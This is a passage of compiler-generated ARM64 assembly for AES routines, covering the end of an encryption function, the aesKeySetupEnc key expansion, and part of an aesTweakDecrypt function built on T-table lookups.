ldr w9, [x9, x10, lsl #2]
eor w8, w8, w9
ldr w9, [sp, #276]
eor w8, w8, w9
ldr w9, [sp, #116]
eor w8, w8, w9
str w8, [sp, #40]
ldr w8, [sp, #52]
lsr w8, w8, #24
adrp x9, _Te4@PAGE
add x9, x9, _Te4@PAGEOFF
str x9, [sp, #32] ; 8-byte Folded Spill
ldr w8, [x9, w8, uxtw #2]
and w8, w8, #0xff000000
ldr w10, [sp, #48]
lsr w10, w10, #16
and w10, w10, #0xff
ldr w10, [x9, w10, uxtw #2]
and w10, w10, #0xff0000
eor w8, w8, w10
ldr w10, [sp, #44]
lsr w10, w10, #8
and w10, w10, #0xff
ldr w10, [x9, w10, uxtw #2]
and w10, w10, #0xff00
eor w8, w8, w10
ldrb w10, [sp, #40]
; kill: def $x10 killed $w10
lsl x10, x10, #2
ldrb w10, [x9, x10]
eor w8, w8, w10
ldr w10, [sp, #280]
eor w8, w8, w10
ldr w10, [sp, #104]
eor w8, w8, w10
str w8, [sp, #68]
ldr w8, [sp, #68]
lsr w8, w8, #24
ldr x10, [sp, #72]
strb w8, [x10]
ldr w8, [sp, #68]
lsr w8, w8, #16
ldr x10, [sp, #72]
strb w8, [x10, #1]
ldr w8, [sp, #68]
lsr w8, w8, #8
ldr x10, [sp, #72]
strb w8, [x10, #2]
ldr w8, [sp, #68]
ldr x10, [sp, #72]
strb w8, [x10, #3]
ldr w8, [sp, #48]
lsr w8, w8, #24
ldr w8, [x9, w8, uxtw #2]
and w8, w8, #0xff000000
ldr w10, [sp, #44]
lsr w10, w10, #16
and w10, w10, #0xff
ldr w10, [x9, w10, uxtw #2]
and w10, w10, #0xff0000
eor w8, w8, w10
ldr w10, [sp, #40]
lsr w10, w10, #8
and w10, w10, #0xff
ldr w10, [x9, w10, uxtw #2]
and w10, w10, #0xff00
eor w8, w8, w10
ldrb w10, [sp, #52]
; kill: def $x10 killed $w10
lsl x10, x10, #2
ldrb w10, [x9, x10]
eor w8, w8, w10
ldr w10, [sp, #284]
eor w8, w8, w10
ldr w10, [sp, #108]
eor w8, w8, w10
str w8, [sp, #64]
ldr w8, [sp, #64]
lsr w8, w8, #24
ldr x10, [sp, #72]
strb w8, [x10, #4]
ldr w8, [sp, #64]
lsr w8, w8, #16
ldr x10, [sp, #72]
strb w8, [x10, #5]
ldr w8, [sp, #64]
lsr w8, w8, #8
ldr x10, [sp, #72]
strb w8, [x10, #6]
ldr w8, [sp, #64]
ldr x10, [sp, #72]
strb w8, [x10, #7]
ldr w8, [sp, #44]
lsr w8, w8, #24
ldr w8, [x9, w8, uxtw #2]
and w8, w8, #0xff000000
ldr w10, [sp, #40]
lsr w10, w10, #16
and w10, w10, #0xff
ldr w10, [x9, w10, uxtw #2]
and w10, w10, #0xff0000
eor w8, w8, w10
ldr w10, [sp, #52]
lsr w10, w10, #8
and w10, w10, #0xff
ldr w10, [x9, w10, uxtw #2]
and w10, w10, #0xff00
eor w8, w8, w10
ldrb w10, [sp, #48]
; kill: def $x10 killed $w10
lsl x10, x10, #2
ldrb w10, [x9, x10]
eor w8, w8, w10
ldr w10, [sp, #288]
eor w8, w8, w10
ldr w10, [sp, #112]
eor w8, w8, w10
str w8, [sp, #60]
ldr w8, [sp, #60]
lsr w8, w8, #24
ldr x10, [sp, #72]
strb w8, [x10, #8]
ldr w8, [sp, #60]
lsr w8, w8, #16
ldr x10, [sp, #72]
strb w8, [x10, #9]
ldr w8, [sp, #60]
lsr w8, w8, #8
ldr x10, [sp, #72]
strb w8, [x10, #10]
ldr w8, [sp, #60]
ldr x10, [sp, #72]
strb w8, [x10, #11]
ldr w8, [sp, #40]
lsr w8, w8, #24
ldr w8, [x9, w8, uxtw #2]
and w8, w8, #0xff000000
ldr w10, [sp, #52]
lsr w10, w10, #16
and w10, w10, #0xff
ldr w10, [x9, w10, uxtw #2]
and w10, w10, #0xff0000
eor w8, w8, w10
ldr w10, [sp, #48]
lsr w10, w10, #8
and w10, w10, #0xff
ldr w10, [x9, w10, uxtw #2]
and w10, w10, #0xff00
eor w8, w8, w10
ldrb w10, [sp, #44]
; kill: def $x10 killed $w10
lsl x10, x10, #2
ldrb w9, [x9, x10]
eor w8, w8, w9
ldr w9, [sp, #292]
eor w8, w8, w9
ldr w9, [sp, #116]
eor w8, w8, w9
str w8, [sp, #56]
ldr w8, [sp, #56]
lsr w8, w8, #24
ldr x9, [sp, #72]
strb w8, [x9, #12]
ldr w8, [sp, #56]
lsr w8, w8, #16
ldr x9, [sp, #72]
strb w8, [x9, #13]
ldr w8, [sp, #56]
lsr w8, w8, #8
ldr x9, [sp, #72]
strb w8, [x9, #14]
ldr w8, [sp, #56]
ldr x9, [sp, #72]
strb w8, [x9, #15]
ldur x9, [x29, #-24]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
bl ___stack_chk_fail
LBB0_2:
ldp x29, x30, [sp, #320] ; 16-byte Folded Reload
ldp x28, x27, [sp, #304] ; 16-byte Folded Reload
add sp, sp, #336
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function aesKeySetupEnc
_aesKeySetupEnc: ; @aesKeySetupEnc
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp, #24]
str x1, [sp, #16]
str wzr, [sp, #12]
ldr x8, [sp, #16]
ldrb w9, [x8]
ldr x8, [sp, #16]
ldrb w8, [x8, #1]
lsl w8, w8, #16
eor w8, w8, w9, lsl #24
ldr x9, [sp, #16]
ldrb w9, [x9, #2]
eor w8, w8, w9, lsl #8
ldr x9, [sp, #16]
ldrb w9, [x9, #3]
eor w8, w8, w9
ldr x9, [sp, #24]
str w8, [x9]
ldr x8, [sp, #16]
ldrb w9, [x8, #4]
ldr x8, [sp, #16]
ldrb w8, [x8, #5]
lsl w8, w8, #16
eor w8, w8, w9, lsl #24
ldr x9, [sp, #16]
ldrb w9, [x9, #6]
eor w8, w8, w9, lsl #8
ldr x9, [sp, #16]
ldrb w9, [x9, #7]
eor w8, w8, w9
ldr x9, [sp, #24]
str w8, [x9, #4]
ldr x8, [sp, #16]
ldrb w9, [x8, #8]
ldr x8, [sp, #16]
ldrb w8, [x8, #9]
lsl w8, w8, #16
eor w8, w8, w9, lsl #24
ldr x9, [sp, #16]
ldrb w9, [x9, #10]
eor w8, w8, w9, lsl #8
ldr x9, [sp, #16]
ldrb w9, [x9, #11]
eor w8, w8, w9
ldr x9, [sp, #24]
str w8, [x9, #8]
ldr x8, [sp, #16]
ldrb w9, [x8, #12]
ldr x8, [sp, #16]
ldrb w8, [x8, #13]
lsl w8, w8, #16
eor w8, w8, w9, lsl #24
ldr x9, [sp, #16]
ldrb w9, [x9, #14]
eor w8, w8, w9, lsl #8
ldr x9, [sp, #16]
ldrb w9, [x9, #15]
eor w8, w8, w9
ldr x9, [sp, #24]
str w8, [x9, #12]
b LBB1_1
LBB1_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #24]
ldr w8, [x8, #12]
str w8, [sp, #8]
ldr x8, [sp, #24]
ldr w8, [x8]
ldr w9, [sp, #8]
lsr w9, w9, #16
and w10, w9, #0xff
adrp x9, _Te4@PAGE
add x9, x9, _Te4@PAGEOFF
ldr w10, [x9, w10, uxtw #2]
and w10, w10, #0xff000000
eor w8, w8, w10
ldr w10, [sp, #8]
lsr w10, w10, #8
and w10, w10, #0xff
ldr w10, [x9, w10, uxtw #2]
and w10, w10, #0xff0000
eor w8, w8, w10
ldrb w10, [sp, #8]
; kill: def $x10 killed $w10
ldr w10, [x9, x10, lsl #2]
and w10, w10, #0xff00
eor w8, w8, w10
ldr w10, [sp, #8]
lsr w10, w10, #24
; kill: def $x10 killed $w10
lsl x10, x10, #2
ldrb w9, [x9, x10]
eor w8, w8, w9
ldrsw x10, [sp, #12]
adrp x9, _rcon@PAGE
add x9, x9, _rcon@PAGEOFF
ldr w9, [x9, x10, lsl #2]
eor w8, w8, w9
ldr x9, [sp, #24]
str w8, [x9, #16]
ldr x8, [sp, #24]
ldr w8, [x8, #4]
ldr x9, [sp, #24]
ldr w9, [x9, #16]
eor w8, w8, w9
ldr x9, [sp, #24]
str w8, [x9, #20]
ldr x8, [sp, #24]
ldr w8, [x8, #8]
ldr x9, [sp, #24]
ldr w9, [x9, #20]
eor w8, w8, w9
ldr x9, [sp, #24]
str w8, [x9, #24]
ldr x8, [sp, #24]
ldr w8, [x8, #12]
ldr x9, [sp, #24]
ldr w9, [x9, #24]
eor w8, w8, w9
ldr x9, [sp, #24]
str w8, [x9, #28]
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
subs w8, w8, #10
cset w8, ne
tbnz w8, #0, LBB1_3
b LBB1_2
LBB1_2:
mov w0, #10
add sp, sp, #32
ret
LBB1_3: ; in Loop: Header=BB1_1 Depth=1
ldr x8, [sp, #24]
add x8, x8, #16
str x8, [sp, #24]
b LBB1_1
.cfi_endproc
; -- End function
.globl _aesTweakDecrypt ; -- Begin function aesTweakDecrypt
.p2align 2
_aesTweakDecrypt: ; @aesTweakDecrypt
.cfi_startproc
; %bb.0:
sub sp, sp, #368
.cfi_def_cfa_offset 368
stp x28, x27, [sp, #336] ; 16-byte Folded Spill
stp x29, x30, [sp, #352] ; 16-byte Folded Spill
add x29, sp, #352
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-24]
str x0, [sp, #112]
str x1, [sp, #104]
str x2, [sp, #96]
str x3, [sp, #88]
ldr x1, [sp, #104]
add x0, sp, #152
bl _aesKeySetupDec
ldr x8, [sp, #96]
ldrb w9, [x8]
ldr x8, [sp, #96]
ldrb w8, [x8, #1]
lsl w8, w8, #16
eor w8, w8, w9, lsl #24
str w8, [sp, #136]
ldr x8, [sp, #96]
ldrb w9, [x8, #2]
ldr x8, [sp, #96]
ldrb w8, [x8, #3]
lsl w8, w8, #16
eor w8, w8, w9, lsl #24
str w8, [sp, #140]
ldr x8, [sp, #96]
ldrb w9, [x8, #4]
ldr x8, [sp, #96]
ldrb w8, [x8, #5]
lsl w8, w8, #16
eor w8, w8, w9, lsl #24
str w8, [sp, #144]
ldr x8, [sp, #96]
ldrb w9, [x8, #6]
ldr x8, [sp, #96]
ldrb w8, [x8, #7]
lsl w8, w8, #16
eor w8, w8, w9, lsl #24
str w8, [sp, #148]
ldr w8, [sp, #136]
lsr w8, w8, #24
; kill: def $x8 killed $w8
lsl x8, x8, #2
adrp x13, _Te4@PAGE
add x13, x13, _Te4@PAGEOFF
str x13, [sp, #8] ; 8-byte Folded Spill
ldrb w8, [x13, x8]
mov x9, x8
adrp x8, _Td0@PAGE
add x8, x8, _Td0@PAGEOFF
str x8, [sp, #16] ; 8-byte Folded Spill
ldr w9, [x8, x9, lsl #2]
ldr w10, [sp, #136]
lsr w10, w10, #16
and w10, w10, #0xff
; kill: def $x10 killed $w10
lsl x10, x10, #2
ldrb w10, [x13, x10]
; kill: def $x10 killed $w10
adrp x11, _Td1@PAGE
add x11, x11, _Td1@PAGEOFF
str x11, [sp, #24] ; 8-byte Folded Spill
ldr w10, [x11, x10, lsl #2]
eor w9, w9, w10
ldr w10, [sp, #136]
lsr w10, w10, #8
and w10, w10, #0xff
; kill: def $x10 killed $w10
lsl x10, x10, #2
ldrb w10, [x13, x10]
mov x12, x10
adrp x10, _Td2@PAGE
add x10, x10, _Td2@PAGEOFF
str x10, [sp, #32] ; 8-byte Folded Spill
ldr w12, [x10, x12, lsl #2]
eor w12, w9, w12
ldrb w9, [sp, #136]
; kill: def $x9 killed $w9
lsl x9, x9, #2
ldrb w9, [x13, x9]
mov x14, x9
adrp x9, _Td3@PAGE
add x9, x9, _Td3@PAGEOFF
str x9, [sp, #40] ; 8-byte Folded Spill
ldr w14, [x9, x14, lsl #2]
eor w12, w12, w14
str w12, [sp, #120]
ldr w12, [sp, #140]
lsr w12, w12, #24
; kill: def $x12 killed $w12
lsl x12, x12, #2
ldrb w12, [x13, x12]
; kill: def $x12 killed $w12
ldr w12, [x8, x12, lsl #2]
ldr w14, [sp, #140]
lsr w14, w14, #16
and w14, w14, #0xff
; kill: def $x14 killed $w14
lsl x14, x14, #2
ldrb w14, [x13, x14]
; kill: def $x14 killed $w14
ldr w14, [x11, x14, lsl #2]
eor w12, w12, w14
ldr w14, [sp, #140]
lsr w14, w14, #8
and w14, w14, #0xff
; kill: def $x14 killed $w14
lsl x14, x14, #2
ldrb w14, [x13, x14]
; kill: def $x14 killed $w14
ldr w14, [x10, x14, lsl #2]
eor w12, w12, w14
ldrb w14, [sp, #140]
; kill: def $x14 killed $w14
lsl x14, x14, #2
ldrb w14, [x13, x14]
; kill: def $x14 killed $w14
ldr w14, [x9, x14, lsl #2]
eor w12, w12, w14
str w12, [sp, #124]
ldr w12, [sp, #144]
lsr w12, w12, #24
; kill: def $x12 killed $w12
lsl x12, x12, #2
ldrb w12, [x13, x12]
; kill: def $x12 killed $w12
ldr w12, [x8, x12, lsl #2]
ldr w14, [sp, #144]
lsr w14, w14, #16
and w14, w14, #0xff
; kill: def $x14 killed $w14
lsl x14, x14, #2
ldrb w14, [x13, x14]
; kill: def $x14 killed $w14
ldr w14, [x11, x14, lsl #2]
eor w12, w12, w14
ldr w14, [sp, #144]
lsr w14, w14, #8
and w14, w14, #0xff
; kill: def $x14 killed $w14
lsl x14, x14, #2
ldrb w14, [x13, x14]
; kill: def $x14 killed $w14
ldr w14, [x10, x14, lsl #2]
eor w12, w12, w14
ldrb w14, [sp, #144]
; kill: def $x14 killed $w14
lsl x14, x14, #2
ldrb w14, [x13, x14]
; kill: def $x14 killed $w14
ldr w14, [x9, x14, lsl #2]
eor w12, w12, w14
str w12, [sp, #128]
ldr w12, [sp, #148]
lsr w12, w12, #24
; kill: def $x12 killed $w12
lsl x12, x12, #2
ldrb w12, [x13, x12]
; kill: def $x12 killed $w12
ldr w12, [x8, x12, lsl #2]
ldr w14, [sp, #148]
lsr w14, w14, #16
and w14, w14, #0xff
; kill: def $x14 killed $w14
lsl x14, x14, #2
ldrb w14, [x13, x14]
; kill: def $x14 killed $w14
ldr w14, [x11, x14, lsl #2]
eor w12, w12, w14
ldr w14, [sp, #148]
lsr w14, w14, #8
and w14, w14, #0xff
; kill: def $x14 killed $w14
lsl x14, x14, #2
ldrb w14, [x13, x14]
; kill: def $x14 killed $w14
ldr w14, [x10, x14, lsl #2]
eor w12, w12, w14
ldrb w14, [sp, #148]
; kill: def $x14 killed $w14
lsl x14, x14, #2
ldrb w13, [x13, x14]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
str w12, [sp, #132]
ldr x12, [sp, #112]
ldrb w13, [x12]
ldr x12, [sp, #112]
ldrb w12, [x12, #1]
lsl w12, w12, #16
eor w12, w12, w13, lsl #24
ldr x13, [sp, #112]
ldrb w13, [x13, #2]
eor w12, w12, w13, lsl #8
ldr x13, [sp, #112]
ldrb w13, [x13, #3]
eor w12, w12, w13
ldr w13, [sp, #152]
eor w12, w12, w13
ldr w13, [sp, #136]
eor w12, w12, w13
str w12, [sp, #84]
ldr x12, [sp, #112]
ldrb w13, [x12, #4]
ldr x12, [sp, #112]
ldrb w12, [x12, #5]
lsl w12, w12, #16
eor w12, w12, w13, lsl #24
ldr x13, [sp, #112]
ldrb w13, [x13, #6]
eor w12, w12, w13, lsl #8
ldr x13, [sp, #112]
ldrb w13, [x13, #7]
eor w12, w12, w13
ldr w13, [sp, #156]
eor w12, w12, w13
ldr w13, [sp, #140]
eor w12, w12, w13
str w12, [sp, #80]
ldr x12, [sp, #112]
ldrb w13, [x12, #8]
ldr x12, [sp, #112]
ldrb w12, [x12, #9]
lsl w12, w12, #16
eor w12, w12, w13, lsl #24
ldr x13, [sp, #112]
ldrb w13, [x13, #10]
eor w12, w12, w13, lsl #8
ldr x13, [sp, #112]
ldrb w13, [x13, #11]
eor w12, w12, w13
ldr w13, [sp, #160]
eor w12, w12, w13
ldr w13, [sp, #144]
eor w12, w12, w13
str w12, [sp, #76]
ldr x12, [sp, #112]
ldrb w13, [x12, #12]
ldr x12, [sp, #112]
ldrb w12, [x12, #13]
lsl w12, w12, #16
eor w12, w12, w13, lsl #24
ldr x13, [sp, #112]
ldrb w13, [x13, #14]
eor w12, w12, w13, lsl #8
ldr x13, [sp, #112]
ldrb w13, [x13, #15]
eor w12, w12, w13
ldr w13, [sp, #164]
eor w12, w12, w13
ldr w13, [sp, #148]
eor w12, w12, w13
str w12, [sp, #72]
ldr w12, [sp, #84]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #72]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #76]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #80]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #168]
eor w12, w12, w13
ldr w13, [sp, #120]
eor w12, w12, w13
str w12, [sp, #68]
ldr w12, [sp, #80]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #84]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #72]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #76]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #172]
eor w12, w12, w13
ldr w13, [sp, #124]
eor w12, w12, w13
str w12, [sp, #64]
ldr w12, [sp, #76]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #80]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #84]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #72]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #176]
eor w12, w12, w13
ldr w13, [sp, #128]
eor w12, w12, w13
str w12, [sp, #60]
ldr w12, [sp, #72]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #76]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #80]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #84]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #180]
eor w12, w12, w13
ldr w13, [sp, #132]
eor w12, w12, w13
str w12, [sp, #56]
ldr w12, [sp, #68]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #56]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #60]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #64]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #184]
eor w12, w12, w13
ldr w13, [sp, #120]
eor w12, w12, w13
str w12, [sp, #84]
ldr w12, [sp, #64]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #68]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #56]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #60]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #188]
eor w12, w12, w13
ldr w13, [sp, #124]
eor w12, w12, w13
str w12, [sp, #80]
ldr w12, [sp, #60]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #64]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #68]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #56]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #192]
eor w12, w12, w13
ldr w13, [sp, #128]
eor w12, w12, w13
str w12, [sp, #76]
ldr w12, [sp, #56]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #60]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #64]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #68]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #196]
eor w12, w12, w13
ldr w13, [sp, #132]
eor w12, w12, w13
str w12, [sp, #72]
ldr w12, [sp, #84]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #72]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #76]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #80]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #200]
eor w12, w12, w13
ldr w13, [sp, #120]
eor w12, w12, w13
str w12, [sp, #68]
ldr w12, [sp, #80]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #84]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #72]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #76]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #204]
eor w12, w12, w13
ldr w13, [sp, #124]
eor w12, w12, w13
str w12, [sp, #64]
ldr w12, [sp, #76]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #80]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #84]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #72]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #208]
eor w12, w12, w13
ldr w13, [sp, #128]
eor w12, w12, w13
str w12, [sp, #60]
ldr w12, [sp, #72]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #76]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #80]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #84]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #212]
eor w12, w12, w13
ldr w13, [sp, #132]
eor w12, w12, w13
str w12, [sp, #56]
ldr w12, [sp, #68]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #56]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #60]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #64]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #216]
eor w12, w12, w13
ldr w13, [sp, #120]
eor w12, w12, w13
str w12, [sp, #84]
ldr w12, [sp, #64]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #68]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #56]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #60]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #220]
eor w12, w12, w13
ldr w13, [sp, #124]
eor w12, w12, w13
str w12, [sp, #80]
ldr w12, [sp, #60]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #64]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #68]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #56]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #224]
eor w12, w12, w13
ldr w13, [sp, #128]
eor w12, w12, w13
str w12, [sp, #76]
ldr w12, [sp, #56]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #60]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #64]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #68]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #228]
eor w12, w12, w13
ldr w13, [sp, #132]
eor w12, w12, w13
str w12, [sp, #72]
ldr w12, [sp, #84]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #72]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #76]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #80]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #232]
eor w12, w12, w13
ldr w13, [sp, #120]
eor w12, w12, w13
str w12, [sp, #68]
ldr w12, [sp, #80]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #84]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #72]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #76]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #236]
eor w12, w12, w13
ldr w13, [sp, #124]
eor w12, w12, w13
str w12, [sp, #64]
ldr w12, [sp, #76]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #80]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #84]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #72]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #240]
eor w12, w12, w13
ldr w13, [sp, #128]
eor w12, w12, w13
str w12, [sp, #60]
ldr w12, [sp, #72]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #76]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #80]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #84]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #244]
eor w12, w12, w13
ldr w13, [sp, #132]
eor w12, w12, w13
str w12, [sp, #56]
ldr w12, [sp, #68]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #56]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #60]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #64]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #248]
eor w12, w12, w13
ldr w13, [sp, #120]
eor w12, w12, w13
